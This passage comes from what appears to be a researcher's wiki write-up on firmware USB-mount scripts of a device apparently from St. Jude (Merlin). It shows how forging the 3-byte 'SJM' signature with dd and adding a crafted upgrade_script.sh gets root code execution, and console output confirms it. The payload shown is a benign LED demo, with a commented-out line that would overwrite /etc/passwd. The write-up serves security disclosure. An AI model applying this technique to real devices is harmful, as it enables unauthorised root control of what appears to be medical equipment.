signature=`cat /tmp/.sign` <br />
<br />
if [ "$signature" = "SJM" ]; then<br />
feedback "Valid pendrive"<br />
echo 0<br />
else<br />
feedback "Invalid pendrive"<br />
echo -1<br />
fi<br />
}<br />
<br />
***snip***<br />
<br />
# We only mount the first partition of a USB storage device. There is no <br />
# requirement to mount multiple partitions. Makes the job easy :-)<br />
function mount_scsi_dev {<br />
local scsi_dev=$1<br />
local mountpt=""<br />
<br />
# check if the first partition of the device is mounted <br />
if ! mount | egrep -q "^$scsi_dev"1"[[:space:]]" <br />
then<br />
mountpt=$(find_unused_mountpt) || error_exit "Failed to find a mount pt"<br />
mkdir -p "$mountpt" || error_exit "Failed to create mount pt $mountpt"<br />
<br />
# FIXME- Ugly hack to detect partitions on USB flash drive<br />
# Possible bug in Kernel and/or devfs. Either use devfs=nomount kernel cmdline<br />
# or fix devfs once and for all.<br />
# There is another problem in devfs that after the USB flash disk is removed<br />
# the corresponding devfs partitions (part1, part2 etc...) still show up. <br />
foobar=`ls -l $scsi_dev | awk '{print $11}'`<br />
dd if=/dev/$foobar of=/dev/null bs=1 count=1 <br />
<br />
# Checking USB signature<br />
ret=`check_sign $scsi_dev` <br />
if [ $ret -eq 0 ]; then<br />
feedback "Valid pendrive"<br />
else<br />
# Tanto: Inform the Exec App to show <br />
# an Invalid Media Error<br />
if [ -p /tmp/remoteInt.pipe ]; then<br />
echo "UsbHotplug InvalidMedia" > /tmp/remoteInt.pipe<br />
error_exit "Invalid pendrive"<br />
else<br />
echo "ERROR: /tmp/remoteInt.pipe does not exist!!!"<br />
fi<br />
fi<br />
<br />
feedback "Mounting $scsi_dev"1" on $mountpt"<br />
mount -t auto $scsi_dev"1" $mountpt<br />
if [ "$?" -eq 0 ]; then<br />
feedback "$scsi_dev"1" is now mounted on $mountpt"<br />
feedback "Launch application specific script" <br />
sh /etc/launch_appln.sh $mountpt<br />
else<br />
feedback "Mount error for $scsi_dev"<br />
fi<br />
else<br />
feedback "Ignoring $scsi_dev - already mounted"<br />
fi<br />
}<br />
<br />
# Find and mount all attached USB storage devices<br />
function mount_all_attached {<br />
local scsiuniqid=""<br />
feedback "Find and mount all attached usb storage devices"<br />
<br />
for scsiuniqid in $(allusb_scsiuniqid)<br />
do<br />
local scsidev="`diskdev_from_uniqid $scsiuniqid`"<br />
if [ "$scsidev" == "UNKNOWN" ]; then<br />
sleep 1<br />
fi<br />
mount_scsi_dev $scsidev<br />
done<br />
}<br />
<br />
***snip***<br />
<br />
<br />
# The remover script will be invoked when the device is removed. This is<br />
# useless in a way because umount will have no effect. The only benefit is<br />
# that the "mount" command will not show stale entries.<br />
<br />
# FIXME - Need to add specialized LOGIC to selectively umount USB flash drive <br />
# which is removed ( unlike umounting all attached USB flash drives )<br />
feedback "REM = $REMOVER"<br />
if [ -f $REMOVER ]; then<br />
echo '/bin/umount /mnt/sjmpendrives/*' >> $REMOVER<br />
else<br />
echo -e '#!/bin/sh\n/bin/umount /mnt/sjmpendrives/*' > $REMOVER<br />
fi<br />
<br />
# Inform the Export data script when pendrive is unplugged.<br />
echo -e '\nps -A | grep export_data \nif [ $? -eq 0 ]; then \n\tif [ -p /tmp/usbDataExport.pipe ]; then \n\t\t echo "Hotplug umount" > /tmp/usbDataExport.pipe \n\tfi\nfi' >> $REMOVER<br />
chmod a+x $REMOVER<br />
<br />
mount_all_attached</pre><br />
<br />
Lets look inside of /etc/launch_appln.sh<br />
<br />
<pre>#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
echo "usage: ./launch_appln.sh /mnt/pendrive"<br />
exit<br />
fi<br />
<br />
# FIXME <br />
# This script may be invoked by hotplug <br />
# Do not run the script if it is already running <br />
# updater or data export<br />
<br />
mountpt=$1<br />
script_path=/apps/tanto/<br />
<br />
if [ -f $mountpt/version.ini ]; then<br />
# call updater script<br />
echo "Launching updater script"<br />
if [ -f $mountpt/etc/init.d/upgrade_script.sh ]; then<br />
sh $mountpt/etc/init.d/upgrade_script.sh $mountpt > /tmp/debugUpdater.txt 2>&1<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
else<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
exit 0<br />
fi<br />
else<br />
# Call Data export script<br />
echo "Launching export data script"<br />
sh $script_path/export_data.sh $mountpt<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
fi</pre><br />
<br />
It looks like their pendrive "signature" is fairly easy to get around.<br />
<br />
<pre>rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00116472 s, 2.6 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign <br />
00000000 00 00 00 |...|<br />
00000003<br />
rjmendez@Reggie:~/stjude_merlin$ hd .sign_mod<br />
00000000 53 4a 4d |SJM|<br />
00000003<br />
rjmendez@Reggie:~/stjude_merlin$ sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00700994 s, 0.4 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00123249 s, 2.4 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign <br />
00000000 53 4a 4d |SJM|<br />
00000003</pre><br />
<br />
Adding the required files to the drive and a small script.<br />
<br />
<pre>rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ ls -lahR<br />
.:<br />
total 36K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 .<br />
drwxr-x---+ 8 root root 4.0K May 14 11:02 ..<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 etc<br />
-rw-r--r-- 1 rjmendez rjmendez 620 May 14 06:01 passwd<br />
-rw-r--r-- 1 rjmendez rjmendez 4 May 10 17:07 version.ini<br />
<br />
./etc:<br />
total 24K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 ..<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 init.d<br />
<br />
./etc/init.d:<br />
total 24K<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 ..<br />
-rw-r--r-- 1 rjmendez rjmendez 771 May 13 18:27 upgrade_script.sh<br />
<br />
rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ cat etc/init.d/upgrade_script.sh <br />
#!/bin/sh<br />
function led_off {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b0<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_dim {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b1<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_bright {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b2<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function party_mode {<br />
counter=0<br />
while [ $counter -lt $1 ];<br />
do<br />
led_off<br />
sleep 0.05<br />
led_dim<br />
sleep 0.05<br />
led_bright<br />
sleep 0.05<br />
let counter=counter+1<br />
done<br />
}<br />
<br />
/etc/init.d/tantoapp stop<br />
#cp /mnt/sjmpendrives/1/passwd /etc/passwd<br />
echo "This worked!" > /root/diditwork.txt<br />
if [ -f /root/diditwork.txt ];<br />
then<br />
party_mode 15<br />
else<br />
echo "It did not work..."<br />
fi</pre><br />
<br />
This is the output that we get from the console.<br />
<br />
<pre>operator@(none):~$ su root<br />
Password: <br />
PAM_unix[265]: (su) session opened for user root by (uid=12)<br />
root@(none):~# hub.c: new USB device usb-mx2hci-2, assigned address 2<br />
scsi0 : SCSI emulation for USB Mass Storage devices<br />
Vendor: Lexar Model: USB Flash Drive Rev: 1100<br />
Type: Direct-Access ANSI SCSI revision: 02<br />
Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0<br />
SCSI device sda: 31285248 512-byte hdwr sectors (16018 MB)<br />
sda: Write Protect is off<br />
Partition check:<br />
/dev/scsi/host0/bus0/target0/lun0: p1<br />
modprobe: Can't locate module /dev/sg1<br />
modprobe: Can't locate module /dev/sg2<br />
modprobe: Can't locate module /dev/sg3<br />
modprobe: Can't locate module /dev/sg4<br />
modprobe: Can't locate module /dev/sg5<br />
modprobe: Can't locate module /dev/sdb<br />
modprobe: Can't locate module /dev/sdc<br />
modprobe: Can't locate module /dev/sdd<br />
modprobe: Can't locate module /dev/sde<br />
modprobe: Can't locate module /dev/sdf<br />
modprobe: modprobe: Can't locate module nls_cp437<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
ls /root<br />
devel_install.sh diditwork.txt setdev.sh setlog.sh<br />
root@(none):~# cat /root/diditwork.txt <br />
This worked!<br />
root@(none):~# cat /tmp/usbstorage.log <br />
+++ Starting USB (un)mounter script for device /proc/bus/usb/001/002<br />
REM = /var/run/usb/%proc%bus%usb%001%002<br />
Find and mount all attached usb storage devices<br />
usb proc-fs yields SCSI host number=0 - suffix with zeroes (kernel 2.4)<br />
Use sgmap to match 0:0:0:0.<br />
Waiting for device id to appear...<br />
SCSI disk for 0:0:0:0 is /dev/sda<br />
Checking /mnt/sjmpendrives/1<br />
Mountpoint /mnt/sjmpendrives/1 is free<br />
Checking signature ... <br />
node1 = /dev/sda1<br />
Valid pendrive<br />
Valid pendrive<br />
Mounting /dev/sda1 on /mnt/sjmpendrives/1<br />
/dev/sda1 is now mounted on /mnt/sjmpendrives/1<br />
Launch application specific script</pre><br />
<br />
== Party Mode Demo ==<br />
{{#ev:youtube|cNcGebu8NRs}}</div>
Rjmendez